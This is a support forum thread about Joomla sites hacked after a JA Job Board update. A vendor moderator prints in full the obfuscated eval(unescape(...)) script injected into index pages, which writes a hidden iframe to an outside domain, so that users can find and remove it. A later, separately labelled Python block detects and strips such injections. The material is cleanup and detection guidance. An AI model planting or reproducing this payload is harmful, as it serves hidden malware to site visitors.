Viewing 6 posts - 1 through 6 (of 6 total)
  • jtruelson Friend
    #150322

    Our development site was compromised. We have had to restore from a recent backup.
    All index pages were appended with hex coded script. Support ticket has been submitted – no reply as of yet.

    So far our efforts to isolate the cause have turned up the following:

    from
    http://www.securityfocus.com/bid/39384

    The JA Job Board ‘com_jajobboard’ component for Joomla! is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input.

    An attacker can exploit these vulnerabilities to obtain potentially sensitive information and to execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.

    JA Job Board ‘com_jajobboard’ 1.4.4 is vulnerable; other versions may be affected.

    Anonymous Moderator
    #340174

    Hello jtruelson,

    We sincerely apologize for all the inconvenience and problems that you have faced. 🙁

    In fact, a new developer was recently assigned to share the support workload for the job board, and while he accessed your source via your FTP, the virus penetrated those files from his infected machine. I would like to confirm that the download package and our dev server are free from viruses.

    His machine has now been reinstalled with anti-virus protection. Please give us access to your FTP again via ticket ID# (DTD-726753) for correcting our mistake and fixing the related issues.

    He handles two cases, and the other has been contacted to check whether he faces the same problem, for the soonest solution.

    spdave Friend
    #340320

    Hello,

    The web site was hacked 2 times since the 1.4.4 update! The web site is now unavailable 😮 for me.

    gavinallday Friend
    #340330

    Hi,

    My site was also hacked on Friday whilst awaiting support from your team.

    We have had to rebuild the site and work is still ongoing to restore it.

    I haven’t been contacted regarding your employee’s virus, but the two might be connected.

    Could you confirm that this is definitely due to a virus on the PC of one of your team, not a vulnerability in JobBoard itself?

    Is there anything else I should do to protect against further attacks?

    Thanks,

    siukin Friend
    #340357

    Also hacked here on Sunday. I submitted a ticket.

    Anonymous Moderator
    #340407

    Hi all,

    • We would like to confirm that this is definitely due to a virus on the PC of one of our team. JA Job Board packages, as well as all other download packages and our dev servers, are protected by a licensed anti-virus system and are free from viruses. This is the first case and will be the last. We hereby apologize for all the inconvenience this may have caused.
    • There are many causes leading to security holes in hacked websites. The problem caused by auto-generated scripts is just one of those.
    • After infection, the system will not work stably. However, if the auto-inserted scripts are removed from the infected files, the whole system will work fine again.
    • SOLUTION:
    – For those whose job site has not been working stably recently, kindly open the source files to track down the infected files. This can be done without affecting the running computer or the whole website, because the strange scripts are lines of JavaScript, not program files with *.exe.
    – Infected files (normally index.php or index2.php and some of the files from the running template) will have the unwanted lines below inserted at the bottom. You can manually search for them and remove them. The unwanted script is as follows:

    <blockquote><script>eval(unescape(‘%65%76%61%6C%28%66%75%6E%63%74%69%6F%6E%28%68%4F%58%2C%73%6A%63%75%2C%73%70%2C%49%41%76%42%2C%53%56%50%45%2C%74%77%68%29%7B%53%56%50%45%3D%66%75%6E%63%74%69%6F%6E%28%73%70%29%7B%72%65%74%75%72%6E%20%73%70%2E%74%6F%53%74%72%69%6E%67%28%73%6A%63%75%29%7D%3B%69%66%28%21%27%27%2E%72%65%70%6C%61%63%65%28%2F%5E%2F%2C%53%74%72%69%6E%67%29%29%7B%77%68%69%6C%65%28%73%70%2D%2D%29%74%77%68%5B%53%56%50%45%28%73%70%29%5D%3D%49%41%76%42%5B%73%70%5D%7C%7C%53%56%50%45%28%73%70%29%3B%49%41%76%42%3D%5B%66%75%6E%63%74%69%6F%6E%28%53%56%50%45%29%7B%72%65%74%75%72%6E%20%74%77%68%5B%53%56%50%45%5D%7D%5D%3B%53%56%50%45%3D%66%75%6E%63%74%69%6F%6E%28%29%7B%72%65%74%75%72%6E%27%5C%5C%77%2B%27%7D%3B%73%70%3D%31%7D%3B%77%68%69%6C%65%28%73%70%2D%2D%29%69%66%28%49%41%76%42%5B%73%70%5D%29%68%4F%58%3D%68%4F%58%2E%72%65%70%6C%61%63%65%28%6E%65%77%20%52%65%67%45%78%70%28%27%5C%5C%62%27%2B%53%56%50%45%28%73%70%29%2B%27%5C%5C%62%27%2C%27%67%27%29%2C%49%41%76%42%5B%73%70%5D%29%3B%72%65%74%75%72%6E%20%68%4F%58%7D%28%27%38%2E%30%28%22%3C%64%20%63%3D%5C%5C%22%62%3A%2F%2F%61%2E%39%2F%5C%5C%22%20%37%3D%31%20%36%3D%31%20%35%3D%5C%5C%22%34%3A%33%3B%32%3A%65%5C%5C%22%3E%22%29%3B%27%2C%31%35%2C%31%35%2C%27%77%72%69%74%65%7C%7C%70%6F%73%69%74%69%6F%6E%7C%68%69%64%64%65%6E%7C%76%69%73%69%62%69%6C%69%74%79%7C%73%74%79%6C%65%7C%68%65%69%67%68%74%7C%77%69%64%74%68%7C%64%6F%63%75%6D%65%6E%74%7C%63%6F%6D%7C%61%76%65%72%73%62%6F%6E%6B%6F%7C%68%74%74%70%7C%73%72%63%7C%69%66%72%61%6D%65%7C%61%62%73%6F%6C%75%74%65%27%2E%73%70%6C%69%74%28%27%7C%27%29%2C%30%2C%7B%7D%29%29’)); </script></blockquote>
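The manual search described in the post above can be automated. The following is an added example, not part of the original thread or the vendor's code: it flags any `<script>eval(unescape('%XX…'))</script>` block in site files, shows a decoded preview without executing anything, and can return the file content with the block removed. The 40-escape threshold, the file suffix list, and the sample payload are assumptions constructed for illustration.

```python
import re
import sys
from pathlib import Path
from urllib.parse import unquote

# <script>eval(unescape('%XX%XX...'))</script>: a long run of percent-encoded
# bytes handed straight to eval. The 40-escape minimum is an assumed threshold
# chosen to avoid matching short, legitimate unescape() calls.
INJECTED = re.compile(
    r"<script[^>]*>\s*eval\(\s*unescape\(\s*['\"]((?:%[0-9A-Fa-f]{2}){40,})['\"]"
    r"\s*\)\s*\)\s*;?\s*</script>",
    re.IGNORECASE,
)

def find_injections(text):
    """Return (offset, decoded_preview) per injected block; nothing is executed."""
    return [(m.start(), unquote(m.group(1))[:80]) for m in INJECTED.finditer(text)]

def strip_injections(text):
    """Return text with injected blocks removed and trailing whitespace tidied."""
    return INJECTED.sub("", text).rstrip() + "\n"

def scan_tree(root, suffixes=(".php", ".html", ".htm", ".js")):
    """Walk a site root and map each infected file path to its findings."""
    hits = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in suffixes:
            found = find_injections(path.read_text(errors="replace"))
            if found:
                hits[str(path)] = found
    return hits

def _encode(js):
    """Percent-encode every byte, mimicking the obfuscation style."""
    return "".join("%%%02X" % b for b in js.encode())

# Constructed sample: a harmless stand-in for the payload, appended to the end
# of an index.php the same way the post describes.
SAMPLE_PAYLOAD = _encode('document.write("constructed placeholder, not the real payload");')
SAMPLE_INDEX = (
    "<?php\necho 'Hello from index.php';\n?>\n"
    "<script>eval(unescape('" + SAMPLE_PAYLOAD + "')); </script>\n"
)

if __name__ == "__main__":
    # Read-only report; compare against a known-good backup before rewriting files.
    for path, found in scan_tree(sys.argv[1] if len(sys.argv) > 1 else ".").items():
        for offset, preview in found:
            print(f"{path}: offset {offset}: {preview!r}")
```

Removing the script restores the pages but does not revoke whatever access wrote it, so FTP credentials used during the affected period should be changed as well.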


This topic contains 6 replies, has 5 voices, and was last updated by Anonymous 14 years, 7 months ago.
